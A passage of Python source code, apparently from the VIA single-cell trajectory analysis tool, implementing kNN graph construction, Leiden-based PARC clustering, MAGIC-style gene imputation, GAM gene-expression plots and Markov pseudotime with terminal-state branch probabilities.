# neighbor array is not listed in in any order of proximity
print('number of components in the original full graph', n_components_original)
print('for downstream visualization purposes we are also constructing a low knn-graph ')
neighbor_array, distance_array = self.knn_struct.knn_query(X_data, k=3)
csr_array = self.make_csrmatrix_noselfloop(neighbor_array, distance_array, auto_ = False)
n_comp, comp_labels = connected_components(csr_array, return_labels=True)
k_0 = 3
if n_components_original == 1:
while (n_comp > 1):
k_0 = k_0 + 1
neighbor_array, distance_array = self.knn_struct.knn_query(X_data, k=k_0)
csr_array = self.make_csrmatrix_noselfloop(neighbor_array, distance_array, auto_=False ) #do not automatically use the local-pruning of Via
n_comp, comp_labels = connected_components(csr_array, return_labels=True)
if n_components_original > 1:
while (k_0 <= 5) & (n_comp > n_components_original):
k_0 = k_0 + 1
neighbor_array, distance_array = self.knn_struct.knn_query(X_data, k=k_0)
csr_array = self.make_csrmatrix_noselfloop(neighbor_array, distance_array,auto_=False ) #do not automatically use the local-pruning of Via)
n_comp, comp_labels = connected_components(csr_array, return_labels=True)
row_list = []
print('size neighbor array in low-KNN in pca-space for visualization', neighbor_array.shape)
n_neighbors = neighbor_array.shape[1]
n_cells = neighbor_array.shape[0]
row_list.extend(list(np.transpose(np.ones((n_neighbors, n_cells)) * range(0, n_cells)).flatten()))
col_list = neighbor_array.flatten().tolist()
weight_list = (distance_array.flatten()).tolist()
csr_full_graph = csr_matrix((np.array(weight_list), (np.array(row_list), np.array(col_list))),
shape=(n_cells, n_cells))
sources, targets = csr_full_graph.nonzero()
edgelist = list(zip(sources.tolist(), targets.tolist()))
Gr = ig.Graph(edgelist, edge_attrs={'weight': csr_full_graph.data.tolist()})
Gr.simplify(combine_edges='sum')
return Gr
def get_gene_expression(self, gene_exp, title_gene=""):
fig_0, ax = plt.subplots()
sc_pt = self.single_cell_pt_markov
sc_bp_original = self.single_cell_bp
n_terminal_states = sc_bp_original.shape[1]
jet = cm.get_cmap('jet', n_terminal_states)
cmap_ = jet(range(n_terminal_states))
for i in range(n_terminal_states):
sc_bp = sc_bp_original.copy()
loc_terminal_i = np.where(np.asarray(self.labels) == self.terminal_clusters[i])[0]
#sc_bp[loc_terminal_i,:] = 1.2
loc_i = np.where(sc_bp[:, i] > 0.8)[0]
val_pt = [sc_pt[pt_i] for pt_i in loc_i] # TODO, replace with array to speed up
# max_val_pt = np.percentile(np.asarray(val_pt),90)
max_val_pt = max(val_pt)
#print('gene exp max pt', max_val_pt)
loc_i_bp = np.where(sc_bp[:, i] > 0.000)[0] #0.001
loc_i_sc = np.where(np.asarray(sc_pt) <= max_val_pt)[0]
# print('loc i bp', loc_i_bp)
# print('loc i sc', loc_i_sc)
loc_ = np.intersect1d(loc_i_bp, loc_i_sc)
# print('loc_', loc_.shape)
gam_in = np.asarray(sc_pt)[loc_]
x = gam_in.reshape(-1, 1)
y = np.asarray(gene_exp)[loc_].reshape(-1, 1)
# print('Gene Expression:', gam_in.shape)
weights = np.asarray(sc_bp[:, i])[loc_].reshape(-1, 1)
# print('Gene Expression: setting up subplot number',i)
if len(loc_)>1:
#geneGAM = pg.LinearGAM(n_splines=20, spline_order=5, lam=10).fit(x, y, weights=weights)
geneGAM = pg.LinearGAM(n_splines=10, spline_order=4, lam=10).fit(x, y, weights=weights)
nx_spacing = 100
xval = np.linspace(min(sc_pt), max_val_pt, nx_spacing * 2)
yg = geneGAM.predict(X=xval)
else: print('loc_ has length zero')
ax.plot(xval, yg, color=cmap_[i], linewidth=2, zorder=3, linestyle=(0, (5, 2, 1, 2)),
dash_capstyle='round', label='TS:' + str(self.terminal_clusters[i]))
plt.legend()
plt.title('Gene Expression ' + title_gene)
return
def do_magic(self,df_gene, magic_steps = 3, gene_list = []):
#ad_gene is an ann data object from scanpy
if self.do_magic_bool == False:
print(colored('please re-run Via with do_magic set to True','red'))
return
else:
from sklearn.preprocessing import normalize
transition_full_graph = normalize(self.csr_full_graph, norm='l1', axis=1) ** magic_steps #normalize across columns to get Transition matrix.
print('shape of transition matrix raised to power 3', transition_full_graph.shape)
subset = df_gene[gene_list].values
print('subset shape', subset.shape)
dot_ = transition_full_graph.dot(subset)#np.dot(transition_full_graph,subset )
print('dot_ product shape', dot_.shape)
df_imputed_gene = pd.DataFrame(dot_, index=df_gene.index, columns=gene_list)
print('shape of imputed gene matrix', df_imputed_gene.shape)
return df_imputed_gene
def run_subPARC(self):
root_user = self.root_user
X_data = self.data
too_big_factor = self.too_big_factor
small_pop = self.small_pop
jac_std_global = self.jac_std_global
jac_weighted_edges = self.jac_weighted_edges
n_elements = X_data.shape[0]
if self.is_coarse == True:
#graph for PARC
neighbor_array, distance_array = self.knn_struct.knn_query(X_data, k=self.knn)
csr_array_locally_pruned = self.make_csrmatrix_noselfloop(neighbor_array, distance_array) #incorporates local distance pruning
sources, targets = csr_array_locally_pruned.nonzero()
edgelist = list(zip(sources, targets))
edgelist_copy = edgelist.copy()
G = ig.Graph(edgelist, edge_attrs={'weight': csr_array_locally_pruned.data.tolist()}) # used for PARC
# print('average degree of prejacard graph is %.1f'% (np.mean(G.degree())))
# print('computing Jaccard metric')
sim_list = G.similarity_jaccard(pairs=edgelist_copy)
print('size neighbor array', neighbor_array.shape)
print('commencing global pruning')
sim_list_array = np.asarray(sim_list)
edge_list_copy_array = np.asarray(edgelist_copy)
if jac_std_global == 'median':
threshold = np.median(sim_list)
else:
threshold = np.mean(sim_list) - jac_std_global * np.std(sim_list)
strong_locs = np.where(sim_list_array > threshold)[0]
print('Share of edges kept after Global Pruning %.2f' % (len(strong_locs) / len(sim_list)), '%')
new_edgelist = list(edge_list_copy_array[strong_locs])
sim_list_new = list(sim_list_array[strong_locs])
G_sim = ig.Graph(n=n_elements, edges=list(new_edgelist), edge_attrs={'weight': sim_list_new})
G_sim.simplify(combine_edges='sum')
if self.is_coarse == True:
#### construct full graph that has no pruning to be used for Clustergraph edges, # not listed in in any order of proximity
row_list = []
n_neighbors = neighbor_array.shape[1]
n_cells = neighbor_array.shape[0]
row_list.extend(list(np.transpose(np.ones((n_neighbors, n_cells)) * range(0, n_cells)).flatten()))
col_list = neighbor_array.flatten().tolist()
print('distance values', np.percentile(distance_array,5),np.percentile(distance_array,95),np.mean(distance_array))
distance_array = np.sqrt(distance_array)
weight_list = (1. / (distance_array.flatten() + 0.05)) #0.05
mean_sqrt_dist_array = np.mean(distance_array)
weight_list = weight_list*(mean_sqrt_dist_array**2)
# we scale weight_list by the mean_distance_value because inverting the distances makes the weights range between 0-1
# and hence too many good neighbors end up having a weight near 0 which is misleading and non-neighbors have weight =0
weight_list = weight_list.tolist()
print('distance values', np.percentile(distance_array, 5), np.percentile(distance_array, 95),
np.mean(distance_array))
csr_full_graph = csr_matrix((np.array(weight_list), (np.array(row_list), np.array(col_list))),
shape=(n_cells, n_cells))
n_original_comp, n_original_comp_labels = connected_components(csr_full_graph, directed=False)
sources, targets = csr_full_graph.nonzero()
edgelist = list(zip(sources.tolist(), targets.tolist()))
G = ig.Graph(edgelist, edge_attrs={'weight': csr_full_graph.data.tolist()})
sim_list = G.similarity_jaccard(pairs=edgelist) # list of jaccard weights
ig_fullgraph = ig.Graph(list(edgelist), edge_attrs={'weight': sim_list})
ig_fullgraph.simplify(combine_edges='sum')
self.csr_array_pruned = G_sim # this graph is pruned for use in PARC
self.ig_full_graph = ig_fullgraph # for VIA we prune the vertex cluster graph *after* making the clustergraph
self.csr_full_graph = csr_full_graph
self.full_neighbor_array = neighbor_array
if self.is_coarse == True:
#knn graph used for making trajectory drawing on the visualization
self.full_graph_shortpath = self.full_graph_paths(X_data, n_original_comp)
neighbor_array = self.full_neighbor_array
if self.is_coarse == False:
ig_fullgraph = self.ig_full_graph #for Trajectory
G_sim = self.csr_array_pruned #for PARC
neighbor_array = self.full_neighbor_array #needed to assign spurious outliers to clusters
# print('average degree of SIMPLE graph is %.1f' % (np.mean(G_sim.degree())))
print('commencing community detection')
if jac_weighted_edges == True:
start_leiden = time.time()
# print('call leiden on weighted graph for ', self.n_iter_leiden, 'iterations')
partition = leidenalg.find_partition(G_sim, leidenalg.ModularityVertexPartition, weights='weight',
n_iterations=self.n_iter_leiden, seed=self.random_seed)
print(time.time() - start_leiden)
else:
start_leiden = time.time()
# print('call leiden on unweighted graph', self.n_iter_leiden, 'iterations')
partition = leidenalg.find_partition(G_sim, leidenalg.ModularityVertexPartition,
n_iterations=self.n_iter_leiden, seed=self.random_seed)
print(time.time() - start_leiden)
time_end_PARC = time.time()
# print('Q= %.1f' % (partition.quality()))
PARC_labels_leiden = np.asarray(partition.membership)
PARC_labels_leiden = np.reshape(PARC_labels_leiden, (n_elements, 1))
pop_list_1 = []
for item in set(list(PARC_labels_leiden.flatten())):
pop_list_1.append([item, list(PARC_labels_leiden.flatten()).count(item)])
print(pop_list_1)
too_big = False
# print('labels found after Leiden', set(list(PARC_labels_leiden.T)[0])) will have some outlier clusters that need to be added to a cluster if a cluster has members that are KNN
cluster_i_loc = np.where(PARC_labels_leiden == 0)[
0] # the 0th cluster is the largest one. so if cluster 0 is not too big, then the others wont be too big either
pop_i = len(cluster_i_loc)
print('largest cluster population', pop_i, too_big_factor, n_elements)
if pop_i > too_big_factor * n_elements: # 0.4
too_big = True
print('too big is', too_big)
cluster_big_loc = cluster_i_loc
list_pop_too_bigs = [pop_i]
cluster_too_big = 0
while too_big == True:
X_data_big = X_data[cluster_big_loc, :]
print(X_data_big.shape)
PARC_labels_leiden_big = self.run_toobig_subPARC(X_data_big)
# print('set of new big labels ', set(PARC_labels_leiden_big.flatten()))
PARC_labels_leiden_big = PARC_labels_leiden_big + 1000
# print('set of new big labels +1000 ', set(list(PARC_labels_leiden_big.flatten())))
pop_list = []
for item in set(list(PARC_labels_leiden_big.flatten())):
pop_list.append([item, list(PARC_labels_leiden_big.flatten()).count(item)])
# print('pop of new big labels', pop_list)
jj = 0
print('shape PARC_labels_leiden', PARC_labels_leiden.shape)
for j in cluster_big_loc:
PARC_labels_leiden[j] = PARC_labels_leiden_big[jj]
jj = jj + 1
dummy, PARC_labels_leiden = np.unique(list(PARC_labels_leiden.flatten()), return_inverse=True)
#print('new set of labels ')
pop_list_1 = []
for item in set(list(PARC_labels_leiden.flatten())):
pop_list_1.append([item, list(PARC_labels_leiden.flatten()).count(item)])
#print(pop_list_1, set(PARC_labels_leiden))
too_big = False
set_PARC_labels_leiden = set(PARC_labels_leiden)
PARC_labels_leiden = np.asarray(PARC_labels_leiden)
for cluster_ii in set_PARC_labels_leiden:
cluster_ii_loc = np.where(PARC_labels_leiden == cluster_ii)[0]
pop_ii = len(cluster_ii_loc)
not_yet_expanded = pop_ii not in list_pop_too_bigs
if pop_ii > too_big_factor * n_elements and not_yet_expanded == True:
too_big = True
#print('cluster', cluster_ii, 'is too big and has population', pop_ii)
cluster_big_loc = cluster_ii_loc
cluster_big = cluster_ii
big_pop = pop_ii
if too_big == True:
list_pop_too_bigs.append(big_pop)
print('cluster', cluster_big, 'is too big with population', big_pop, '. It will be expanded')
dummy, PARC_labels_leiden = np.unique(list(PARC_labels_leiden.flatten()), return_inverse=True)
small_pop_list = []
small_cluster_list = []
small_pop_exist = False
for cluster in set(PARC_labels_leiden):
population = len(np.where(PARC_labels_leiden == cluster)[0])
if population < small_pop: # 10
small_pop_exist = True
small_pop_list.append(list(np.where(PARC_labels_leiden == cluster)[0]))
small_cluster_list.append(cluster)
for small_cluster in small_pop_list:
for single_cell in small_cluster:
old_neighbors = neighbor_array[single_cell, :]
group_of_old_neighbors = PARC_labels_leiden[old_neighbors]
group_of_old_neighbors = list(group_of_old_neighbors.flatten())
available_neighbours = set(group_of_old_neighbors) - set(small_cluster_list)
if len(available_neighbours) > 0:
available_neighbours_list = [value for value in group_of_old_neighbors if
value in list(available_neighbours)]
best_group = max(available_neighbours_list, key=available_neighbours_list.count)
PARC_labels_leiden[single_cell] = best_group
time_smallpop = time.time()
while (small_pop_exist) == True & (time.time() - time_smallpop < 15):
small_pop_list = []
small_pop_exist = False
for cluster in set(list(PARC_labels_leiden.flatten())):
population = len(np.where(PARC_labels_leiden == cluster)[0])
if population < small_pop:
small_pop_exist = True
# print(cluster, ' has small population of', population, )
small_pop_list.append(np.where(PARC_labels_leiden == cluster)[0])
for small_cluster in small_pop_list:
for single_cell in small_cluster:
old_neighbors = neighbor_array[single_cell, :]
group_of_old_neighbors = PARC_labels_leiden[old_neighbors]
group_of_old_neighbors = list(group_of_old_neighbors.flatten())
best_group = max(set(group_of_old_neighbors), key=group_of_old_neighbors.count)
PARC_labels_leiden[single_cell] = best_group
dummy, PARC_labels_leiden = np.unique(list(PARC_labels_leiden.flatten()), return_inverse=True)
PARC_labels_leiden = list(PARC_labels_leiden.flatten())
# print('final labels allocation', set(PARC_labels_leiden))
pop_list = []
pop_list_raw = []
for item in range(len(set(PARC_labels_leiden))):
pop_item = PARC_labels_leiden.count(item)
pop_list.append((item, pop_item))
pop_list_raw.append(pop_item)
print('list of cluster labels and populations', len(pop_list), pop_list)
self.labels = PARC_labels_leiden # list
n_clus = len(set(self.labels))
##determine majority truth
if self.pseudotime == True:
## Make cluster-graph (1)
vc_graph = ig.VertexClustering(ig_fullgraph,
membership=PARC_labels_leiden) # jaccard weights, bigger is better
vc_graph = vc_graph.cluster_graph(combine_edges='sum')
# print('vc graph G_sim', vc_graph)
# print('vc graph G_sim old', vc_graph_old)
reweighted_sparse_vc, edgelist = self.recompute_weights(vc_graph, pop_list_raw)
print('len old edge list', edgelist) # 0.15 for CD34
if self.dataset == 'toy': # ''humanCD34':# == False:
global_pruning_std = 2
print('Toy: global cluster graph pruning level', global_pruning_std)
# toy data is usually simpler so we dont need to prune the links as the clusters are usually well separated such that spurious links dont exist
elif self.dataset == 'bcell':
global_pruning_std = 0.15
print('Bcell: global cluster graph pruning level', global_pruning_std)
else:
global_pruning_std = 0.15
print('Humancd34: global cluster graph pruning level', global_pruning_std)
edgeweights, edgelist, comp_labels = local_pruning_clustergraph_mst(reweighted_sparse_vc,
global_pruning_std=global_pruning_std,
preserve_disconnected=self.preserve_disconnected) # 0.8 on 20knn and 40ncomp #0.15
self.connected_comp_labels = comp_labels
print('final comp labels set', set(comp_labels))
print('len new edge list', edgelist)
locallytrimmed_g = ig.Graph(edgelist, edge_attrs={'weight': edgeweights.tolist()})
# print('locally trimmed_g', locallytrimmed_g)
locallytrimmed_g = locallytrimmed_g.simplify(combine_edges='sum')
# print('locally trimmed and simplified', locallytrimmed_g)
locallytrimmed_sparse_vc = get_sparse_from_igraph(locallytrimmed_g, weight_attr='weight')
layout = locallytrimmed_g.layout_fruchterman_reingold(
weights='weight') ##final layout based on locally trimmed
# globally trimmed link
sources, targets = locallytrimmed_sparse_vc.nonzero()
edgelist_simple = list(zip(sources.tolist(), targets.tolist()))
edgelist_unique = set(tuple(sorted(l)) for l in edgelist_simple) # keep only one of (0,1) and (1,0)
self.edgelist_unique = edgelist_unique
self.edgelist = edgelist
x_lazy = self.x_lazy
alpha_teleport = self.alpha_teleport
# number of components
graph_dict = {}
n_components, labels = connected_components(csgraph=locallytrimmed_sparse_vc, directed=False,
return_labels=True)
print('there are ', n_components, 'components in the graph')
df_graph = pd.DataFrame(locallytrimmed_sparse_vc.todense())
df_graph['cc'] = labels
df_graph['pt'] = float('NaN')
df_graph['markov_pt'] = float('NaN')
df_graph['majority_truth'] = 'maj truth'
df_graph['graph_node_label'] = 'node label'
set_parc_labels = list(set(PARC_labels_leiden))
set_parc_labels.sort()
print('parc labels', set_parc_labels)
#for ii, jj in enumerate(PARC_labels_leiden):
terminal_clus = []
node_deg_list = []
super_terminal_clus_revised = []
pd_columnnames_terminal = []
dict_terminal_super_sub_pairs = {}
self.root = []
for comp_i in range(n_components):
loc_compi = np.where(labels == comp_i)[0]
a_i = df_graph.iloc[loc_compi][loc_compi].values
a_i = csr_matrix(a_i, (a_i.shape[0], a_i.shape[0]))
cluster_labels_subi = [x for x in loc_compi]
sc_labels_subi = [PARC_labels_leiden[i] for i in range(len(PARC_labels_leiden)) if
(PARC_labels_leiden[i] in cluster_labels_subi)]
sc_truelabels_subi = [self.true_label[i] for i in range(len(PARC_labels_leiden)) if
(PARC_labels_leiden[i] in cluster_labels_subi)]
if self.dataset == 'toy':
if self.super_cluster_labels != False:
super_labels_subi = [self.super_cluster_labels[i] for i in range(len(PARC_labels_leiden)) if
(PARC_labels_leiden[i] in cluster_labels_subi)]
print('super node degree', self.super_node_degree_list)
graph_node_label, majority_truth_labels, node_deg_list_i, root_i = self.find_root(a_i,
sc_labels_subi,
root_user,
sc_truelabels_subi,
super_labels_subi,
self.super_node_degree_list)
else:
graph_node_label, majority_truth_labels, node_deg_list_i, root_i = self.find_root(a_i,
sc_labels_subi,
root_user,
sc_truelabels_subi,
[], [])
elif self.dataset == 'humanCD34':
graph_node_label, majority_truth_labels, node_deg_list_i, root_i = self.find_root_HumanCD34(a_i,
sc_labels_subi,
root_user,
sc_truelabels_subi)
elif self.dataset == 'bcell':
'''
if self.super_cluster_labels != False:
super_labels_subi = [self.super_cluster_labels[i] for i in range(len(PARC_labels_leiden)) if
(PARC_labels_leiden[i] in cluster_labels_subi)]
graph_node_label, majority_truth_labels, node_deg_list_i, root_i = self.find_root(a_i,
sc_labels_subi,
root_user,
sc_truelabels_subi,
super_labels_subi,
self.super_node_degree_list)
else: # if this is p0.run()
graph_node_label, majority_truth_labels, node_deg_list_i, root_i = self.find_root(a_i,
sc_labels_subi,
root_user,
sc_truelabels_subi,
[], [])
'''
graph_node_label, majority_truth_labels, node_deg_list_i, root_i = self.find_root_bcell(a_i,
sc_labels_subi,
root_user,
sc_truelabels_subi)
self.root.append(root_i)
for item in node_deg_list_i:
node_deg_list.append(item)
print('a_i shape, true labels shape', a_i.shape, len(sc_truelabels_subi), len(sc_labels_subi))
new_root_index_found = False
for ii, llabel in enumerate(cluster_labels_subi):
if root_i == llabel:
new_root_index = ii
new_root_index_found = True
print('new root index', new_root_index)
if new_root_index_found == False:
print('cannot find the new root index')
new_root_index = 0
hitting_times, roundtrip_times = self.compute_hitting_time(a_i, root=new_root_index,
x_lazy=x_lazy, alpha_teleport=alpha_teleport)
# rescale hitting times
very_high = np.mean(hitting_times) + 1.5 * np.std(hitting_times)
without_very_high_pt = [iii for iii in hitting_times if iii < very_high]
new_very_high = np.mean(without_very_high_pt) + np.std(without_very_high_pt)
print('very high, and new very high', very_high, new_very_high)
new_hitting_times = [x if x < very_high else very_high for x in hitting_times]
hitting_times = np.asarray(new_hitting_times)
scaling_fac = 10 / max(hitting_times)
hitting_times = hitting_times * scaling_fac
s_ai, t_ai = a_i.nonzero()
edgelist_ai = list(zip(s_ai, t_ai))
edgeweights_ai = a_i.data
# print('edgelist ai', edgelist_ai)
# print('edgeweight ai', edgeweights_ai)
biased_edgeweights_ai = get_biased_weights(edgelist_ai, edgeweights_ai, hitting_times)
# biased_sparse = csr_matrix((biased_edgeweights, (row, col)))
adjacency_matrix_ai = np.zeros((a_i.shape[0], a_i.shape[0]))
for i, (start, end) in enumerate(edgelist_ai):
adjacency_matrix_ai[start, end] = biased_edgeweights_ai[i]
markov_hitting_times_ai = self.simulate_markov(adjacency_matrix_ai,
new_root_index) # +adjacency_matrix.T))
print('markov_hitting times ')
for eee, ttt in enumerate(markov_hitting_times_ai):
print('cluster ', eee, ' had markov time', ttt)
very_high = np.mean(markov_hitting_times_ai) + 1.5 * np.std(markov_hitting_times_ai)
very_high = min(very_high, max(markov_hitting_times_ai))
without_very_high_pt = [iii for iii in markov_hitting_times_ai if iii < very_high]
new_very_high = min(np.mean(without_very_high_pt) + np.std(without_very_high_pt), very_high)
print('very high, and new very high', very_high, new_very_high)
new_markov_hitting_times_ai = [x if x < very_high else very_high for x in markov_hitting_times_ai]
for eee, ttt in enumerate(new_markov_hitting_times_ai):
print('cluster ', eee, ' had markov time', ttt)
markov_hitting_times_ai = np.asarray(new_markov_hitting_times_ai)
scaling_fac = 10 / max(markov_hitting_times_ai)
markov_hitting_times_ai = markov_hitting_times_ai * scaling_fac
for eee, ttt in enumerate(markov_hitting_times_ai):
print('cluster ', eee, ' had markov time', ttt)
print('markov hitting times', [(i, j) for i, j in enumerate(markov_hitting_times_ai)])
print('hitting times', [(i, j) for i, j in enumerate(hitting_times)])
markov_hitting_times_ai = (markov_hitting_times_ai )#+ hitting_times)*.5 #consensus
adjacency_matrix_csr_ai = sparse.csr_matrix(adjacency_matrix_ai)
(sources, targets) = adjacency_matrix_csr_ai.nonzero()
edgelist_ai = list(zip(sources, targets))
weights_ai = adjacency_matrix_csr_ai.data
bias_weights_2_ai = get_biased_weights(edgelist_ai, weights_ai, markov_hitting_times_ai, round_no=2)
adjacency_matrix2_ai = np.zeros((adjacency_matrix_ai.shape[0], adjacency_matrix_ai.shape[0]))
for i, (start, end) in enumerate(edgelist_ai):
adjacency_matrix2_ai[start, end] = bias_weights_2_ai[i]
if self.super_terminal_cells == False:
terminal_clus_ai = self.get_terminal_clusters(adjacency_matrix2_ai, markov_hitting_times_ai,
new_root_index)
for i in terminal_clus_ai:
terminal_clus.append(cluster_labels_subi[i])
elif len(self.super_terminal_clusters) > 0:
sub_terminal_clus_temp_ = []
terminal_clus_ai = []
for i in self.super_terminal_clusters:
print('super cluster terminal label', i)
sub_terminal_clus_temp_loc = np.where(np.asarray(self.super_cluster_labels) == i)[0]
# print('sub_terminal_clus_temp_loc', sub_terminal_clus_temp_loc)
temp_set = set(list(np.asarray(self.labels)[sub_terminal_clus_temp_loc]))
# print('temp set', temp_set)
temp_max_pt = 0
most_likely_sub_terminal = False
count_frequency_super_in_sub = 0
for j in temp_set:
super_cluster_composition_loc = np.where(np.asarray(self.labels) == j)[0]
super_cluster_composition = self.func_mode(
list(np.asarray(self.super_cluster_labels)[super_cluster_composition_loc]))
# print('the composision of sub cluster', j, 'is mostly', super_cluster_composition)
if (markov_hitting_times_ai[j] > temp_max_pt) & (super_cluster_composition == i):
temp_max_pt = markov_hitting_times_ai[j]
print('super, j and temp max pt', i, j, temp_max_pt)
most_likely_sub_terminal = j
if most_likely_sub_terminal == False:
print('no sub cluster has majority made of super-cluster ', i)
for j in temp_set:
super_cluster_composition_loc = np.where(np.asarray(self.labels) == j)[0]
count_frequency_super_in_sub_temp = list(
np.asarray(self.super_cluster_labels)[super_cluster_composition_loc]).count(i)
count_frequency_super_in_sub_temp_ratio = count_frequency_super_in_sub_temp/len(super_cluster_composition_loc)
if (markov_hitting_times_ai[j] > np.percentile(
np.asarray(markov_hitting_times_ai), 30)) & (
count_frequency_super_in_sub_temp_ratio > count_frequency_super_in_sub):
count_frequency_super_in_sub = count_frequency_super_in_sub_temp
#temp_max_pt = markov_hitting_times_ai[j]
most_likely_sub_terminal = j
sub_terminal_clus_temp_.append(most_likely_sub_terminal)
if (markov_hitting_times_ai[most_likely_sub_terminal] > np.percentile(
np.asarray(markov_hitting_times_ai), 30)):
dict_terminal_super_sub_pairs.update({i: most_likely_sub_terminal})
super_terminal_clus_revised.append(i)
terminal_clus.append(most_likely_sub_terminal)
terminal_clus_ai.append(
np.where(np.asarray(cluster_labels_subi) == most_likely_sub_terminal)[0][0]) # =i
# terminal_clus_ai.append(most_likely_sub_terminal)
print('the sub terminal cluster that best captures the super terminal', i, 'is',
most_likely_sub_terminal)
else:
print('the sub terminal cluster that best captures the super terminal', i, 'is',
most_likely_sub_terminal, 'but the pseudotime is too low')
else:
print('super terminal cells', self.super_terminal_cells)
print([self.labels[ti] for ti in
self.super_terminal_cells]) # find the sub-cluster which contains the single-cell-superterminal
temp = [self.labels[ti] for ti in self.super_terminal_cells if
self.labels[ti] in cluster_labels_subi]
terminal_clus_ai = []
for i in temp:
terminal_clus_ai.append(np.where(np.asarray(cluster_labels_subi) == i)[0][0])
terminal_clus.append(i)
dict_terminal_super_sub_pairs.update({i: most_likely_sub_terminal})
# for i in temp:
# terminal_clus.append(i)
print('terminal clus in this a_i', terminal_clus_ai)
print('final terminal clus', terminal_clus)
for target_terminal in terminal_clus_ai:
#prob_ai = self.prob_reaching_terminal_state(target_terminal, terminal_clus_ai, adjacency_matrix2_ai, new_root_index, pt=markov_hitting_times_ai, num_sim=500)
prob_ai = self.simulate_branch_probability(target_terminal, terminal_clus_ai, adjacency_matrix2_ai,
new_root_index, pt=markov_hitting_times_ai, num_sim=500) #50 ToDO change back to 500 = numsim
df_graph['terminal_clus' + str(cluster_labels_subi[target_terminal])] = 0.0000000
pd_columnnames_terminal.append('terminal_clus' + str(cluster_labels_subi[target_terminal]))
print('prob ai for target terminal', target_terminal, prob_ai)
for k, prob_ii in enumerate(prob_ai):
df_graph.at[cluster_labels_subi[k], 'terminal_clus' + str(
cluster_labels_subi[target_terminal])] = prob_ii
bp_array = df_graph[pd_columnnames_terminal].values
bp_array[np.isnan(bp_array)]=0.00000001
#print('final bp_array NOT normed by rowsum', bp_array)
bp_array = bp_array / bp_array.sum(axis=1)[:, None]
bp_array[np.isnan(bp_array)] = 0.00000001
#print('final bp_array normed by rowsum', bp_array)
for ei, ii in enumerate(loc_compi):
df_graph.at[ii, 'pt'] = hitting_times[ei]
df_graph.at[ii, 'graph_node_label'] = graph_node_label[ei]
df_graph.at[ii, 'majority_truth'] = graph_node_label[ei]
df_graph.at[ii, 'markov_pt'] = markov_hitting_times_ai[ei]
locallytrimmed_g.vs["label"] = df_graph['graph_node_label'].values
hitting_times = df_graph['pt'].values
if len(super_terminal_clus_revised) > 0:
self.revised_super_terminal_clusters = super_terminal_clus_revised
else:
self.revised_super_terminal_clusters = self.super_terminal_clusters
self.hitting_times = hitting_times # * 1000
self.markov_hitting_times = df_graph['markov_pt'].values
self.terminal_clusters = terminal_clus
print('terminal clusters', terminal_clus)
self.node_degree_list = node_deg_list
print(colored('project onto sc','red'))
self.project_branch_probability_sc(bp_array, df_graph['markov_pt'].values)
self.dict_terminal_super_sub_pairs = dict_terminal_super_sub_pairs
hitting_times = self.markov_hitting_times
bias_weights_2_all = get_biased_weights(edgelist, edgeweights, self.markov_hitting_times, round_no=2)
row_list = []
col_list = []
for (rowi, coli) in edgelist:
row_list.append(rowi)
col_list.append(coli)
# print('shape', a_i.shape[0], a_i.shape[0], row_list)
temp_csr = csr_matrix((np.array(bias_weights_2_all), (np.array(row_list), np.array(col_list))),
shape=(n_clus, n_clus))
if self.dataset == 'toy': # 'humanCD34':#False:
visual_global_pruning_std = 0.15
max_outgoing = 4
else:
visual_global_pruning_std = 1 # 0.15#0 for human
max_outgoing = 2
# glob_std_pruning =0 and max_out = 2 for HumanCD34 to simplify structure
edgeweights_maxout_2, edgelist_maxout_2, comp_labels_2 = local_pruning_clustergraph_mst(temp_csr,
global_pruning_std=visual_global_pruning_std,
max_outgoing=max_outgoing,
preserve_disconnected=self.preserve_disconnected)
row_list = []
col_list = []
for (rowi, coli) in edgelist_maxout_2:
row_list.append(rowi)
col_list.append(coli)
temp_csr = csr_matrix((np.array(edgeweights_maxout_2), (np.array(row_list), np.array(col_list))),
shape=(n_clus, n_clus))
temp_csr = temp_csr.transpose().todense() + temp_csr.todense()
temp_csr = np.tril(temp_csr, -1) # elements along the main diagonal and above are set to zero
temp_csr = csr_matrix(temp_csr)
edgeweights_maxout_2 = temp_csr.data
scale_factor = max(edgeweights_maxout_2) - min(edgeweights_maxout_2)
edgeweights_maxout_2 = [((wi + .1) * 2.5 / scale_factor) + 0.1 for wi in edgeweights_maxout_2]
sources, targets = temp_csr.nonzero()
edgelist_maxout_2 = list(zip(sources.tolist(), targets.tolist()))
self.edgelist_maxout = edgelist_maxout_2
self.edgeweights_maxout = edgeweights_maxout_2
remove_outliers = hitting_times
threshold = np.percentile(remove_outliers, 95) # np.mean(remove_outliers) + 1* np.std(remove_outliers)
th_hitting_times = [x if x < threshold else threshold for x in hitting_times]
remove_outliers_low = hitting_times[hitting_times < (np.mean(hitting_times) - 0.3 * np.std(hitting_times))]
threshold_low = np.mean(remove_outliers_low) - 0.3 * np.std(remove_outliers_low)
threshold_low = np.percentile(remove_outliers_low, 5)
# print('thresh low', threshold_low)
th_hitting_times = [x if x > threshold_low else threshold_low for x in th_hitting_times]
scaled_hitting_times = (th_hitting_times - np.min(th_hitting_times))
scaled_hitting_times = scaled_hitting_times * (1000 / np.max(scaled_hitting_times))
self.scaled_hitting_times = scaled_hitting_times
# self.single_cell_pt = self.project_hittingtimes_sc(self.hitting_times)
# self.single_cell_pt_stationary_bias = self.project_hittingtimes_sc(self.stationary_hitting_times.flatten())
# self.dijkstra_hitting_times = self.path_length_onbias(edgelist, biased_edgeweights)
# print('dijkstra hitting times', [(i,j) for i,j in enumerate(self.dijkstra_hitting_times)])
# self.single_cell_pt_dijkstra_bias = self.project_hittingtimes_sc(self.dijkstra_hitting_times)
scaled_hitting_times = scaled_hitting_times.astype(int)
pal = ig.drawing.colors.AdvancedGradientPalette(['yellow', 'green', 'blue'], n=1001)
all_colors = []
for i in scaled_hitting_times:
all_colors.append(pal.get(int(i))[0:3])
locallytrimmed_g.vs['hitting_times'] = scaled_hitting_times
locallytrimmed_g.vs['color'] = [pal.get(i)[0:3] for i in scaled_hitting_times]
self.group_color = [colors.to_hex(v) for v in locallytrimmed_g.vs['color']] # based on ygb scale
viridis_cmap = cm.get_cmap('viridis_r')
self.group_color_cmap = [colors.to_hex(v) for v in
viridis_cmap(scaled_hitting_times / 1000)] # based on ygb scale
self.graph_node_label = df_graph['graph_node_label'].values
self.edgeweight = [e['weight'] * 1 for e in locallytrimmed_g.es]
print('self edge weight', len(self.edgeweight), self.edgeweight)
print('self edge list', len(self.edgelist_unique), self.edgelist_unique)
self.graph_node_pos = layout.coords
f, ((ax, ax1)) = plt.subplots(1, 2, sharey=True)
self.draw_piechart_graph(ax, ax1)
plt.show()
return
